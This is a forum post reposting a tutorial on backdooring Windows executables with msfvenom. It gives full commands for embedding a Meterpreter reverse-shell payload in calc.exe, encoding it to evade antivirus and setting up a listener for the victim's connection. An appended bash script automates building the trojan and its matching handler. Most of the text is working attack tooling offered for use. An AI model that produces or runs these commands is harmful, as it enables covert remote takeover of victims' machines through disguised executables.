Praetorian503 Posted February 16, 2013

Description: Today I am going to show you how to backdoor executables using msfvenom. This is a very handy tool in exploitation.

What is MSFVenom? MSFVenom is a combination of MSFPayload and MSFEncode. It is an all-in-one tool that makes creating backdoored executables easy. In this tutorial I will backdoor calc.exe on a Windows XP SP2 system. I will use a reverse connection back to my BackTrack machine. Our template is calc.exe, and we will encode with the x86/shikata_ga_nai encoder (I normally use this, you can use whatever you like) and run the encoding 10 times. So these are the parameters for msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ your local ip ] LPORT=[ your local port ] -x calc.exe -k -e x86/shikata_ga_nai -i 10 -f exe > calc_backdoor.exe

I will break it down and explain it for you. -p is our payload; here I have used a Meterpreter reverse connection, which is awesome to use. LHOST is your local IP and LPORT is the local port you will be listening on. -x is the template we are going to use, or simply our custom executable. -k keeps the template's original behaviour and injects the payload as a new thread, so calc.exe still loads and runs as a calculator; without -k the template's code is replaced and only the payload executes. -e is the encoder to use; you can use whatever you like, and you can list all the encoders in the Metasploit Framework by typing 'show encoders'. Encoders are useful for evading AV, but they are not as effective as people think: the output of well-known encoders such as shikata_ga_nai is widely signatured, and the best results come from writing a custom encoder. -i stands for iterations, our count of how many times to encode. -f is the output format; in my case I will use exe.

So that's it for creating our backdoor. Now we will launch Metasploit and use exploit/multi/handler. This is a stub that handles connections from payloads launched outside the framework.
Because our backdoor connects back with the settings we baked into it, the handler must be given the same payload, the same LHOST and the same LPORT that we used when creating the backdoor; a mismatch on any of the three means the stager connects but no session is established. Set those options, run exploit, and msf will start listening.

Okay, now let's drop our created backdoor, which works fine as a calculator, just like a clone of the real one. Once the victim runs our infected calc.exe we should get a nice Meterpreter reverse connection. So that's it, the box is pwned.

We can create the same backdoor by piping msfpayload into msfencode, which results in a very long command line that is difficult to memorize:

msfpayload windows/meterpreter/reverse_tcp LHOST=[ your local ip ] LPORT=[ your local port ] R | msfencode -e x86/shikata_ga_nai -c 10 -o calc_backdoor.exe -t exe -x calc.exe -k

So by using MSFVenom we can easily generate a payload along with encoding in a simple manner. I hope you learned something useful. Thank you.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Making Backdoors With Msfvenom
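The whole procedure above (build the backdoored executable, then start a multi/handler with matching payload, LHOST and LPORT) is easy to get wrong by hand because the same three values are typed twice. The script below is an added example, not part of the original post: it validates LHOST and LPORT once, builds the exact msfvenom command line from the post, writes a matching msfconsole resource file for exploit/multi/handler from the same variables, and records SHA-256 hashes of the template and the output so you can tell the backdoored binary from the clean one later. The file names (calc.exe, calc_backdoor.exe) and the handler resource name are assumptions; msfvenom, msfconsole and sha256sum are only invoked by the build_backdoor function, so the helper functions can be exercised without Metasploit installed.

```bash
#!/usr/bin/env bash
# Added example (not the original post's code): keeps the msfvenom payload
# and the multi/handler listener in sync. Assumed names: calc.exe,
# calc_backdoor.exe, <out>_handler.rc.
set -eu

PAYLOAD="windows/meterpreter/reverse_tcp"
ENCODER="x86/shikata_ga_nai"

# Succeed only for a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
  local ip=$1 o
  case "$ip" in
    *[!0-9.]*|.*|*.|*..*|'') return 1 ;;
  esac
  local IFS=.
  set -- $ip
  [ $# -eq 4 ] || return 1
  for o in "$@"; do
    [ "$o" -le 255 ] || return 1
  done
}

# Succeed only for an integer port in 1..65535.
valid_port() {
  case "$1" in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the msfvenom command line from the post for the given settings.
# Usage: gen_venom_cmd LHOST LPORT TEMPLATE OUTFILE ITERATIONS
gen_venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -x %s -k -e %s -i %s -f exe > %s\n' \
    "$PAYLOAD" "$1" "$2" "$3" "$ENCODER" "$5" "$4"
}

# Print an msfconsole resource script for exploit/multi/handler that uses the
# same payload, LHOST and LPORT as the backdoor. -j backgrounds the handler
# and ExitOnSession false keeps it listening after the first session.
# Usage: gen_handler_rc LHOST LPORT
gen_handler_rc() {
  printf 'use exploit/multi/handler\n'
  printf 'set PAYLOAD %s\n' "$PAYLOAD"
  printf 'set LHOST %s\n' "$1"
  printf 'set LPORT %s\n' "$2"
  printf 'set ExitOnSession false\n'
  printf 'exploit -j\n'
}

# Validate inputs, build the backdoor with msfvenom, write the handler
# resource file beside it and hash both binaries.
# Usage: build_backdoor LHOST LPORT TEMPLATE OUTFILE [ITERATIONS]
build_backdoor() {
  local lhost=$1 lport=$2 template=$3 out=$4 iter=${5:-10} rc
  valid_ipv4 "$lhost" || { echo "LHOST '$lhost' is not an IPv4 address" >&2; return 1; }
  valid_port "$lport" || { echo "LPORT '$lport' is not a valid port" >&2; return 1; }
  [ -f "$template" ] || { echo "template '$template' not found" >&2; return 1; }
  rc="${out%.exe}_handler.rc"
  echo "[*] $(gen_venom_cmd "$lhost" "$lport" "$template" "$out" "$iter")"
  msfvenom -p "$PAYLOAD" LHOST="$lhost" LPORT="$lport" \
    -x "$template" -k -e "$ENCODER" -i "$iter" -f exe > "$out"
  gen_handler_rc "$lhost" "$lport" > "$rc"
  echo "[*] handler written to $rc; start it with: msfconsole -r $rc"
  sha256sum "$template" "$out"
}

# Only build when invoked with arguments, e.g.:
#   ./build_backdoor.sh 192.168.56.101 4444 calc.exe calc_backdoor.exe 10
if [ $# -ge 4 ]; then
  build_backdoor "$@"
fi
```

Start the listener with msfconsole -r calc_backdoor_handler.rc before the target runs the binary, so the stager has something to connect to. The hashes printed at the end are the artifact a blue team would use to spot the modified calc.exe, which is a reminder that -k leaves a file that looks like calc.exe to the user but not to anyone comparing it against the known-good hash.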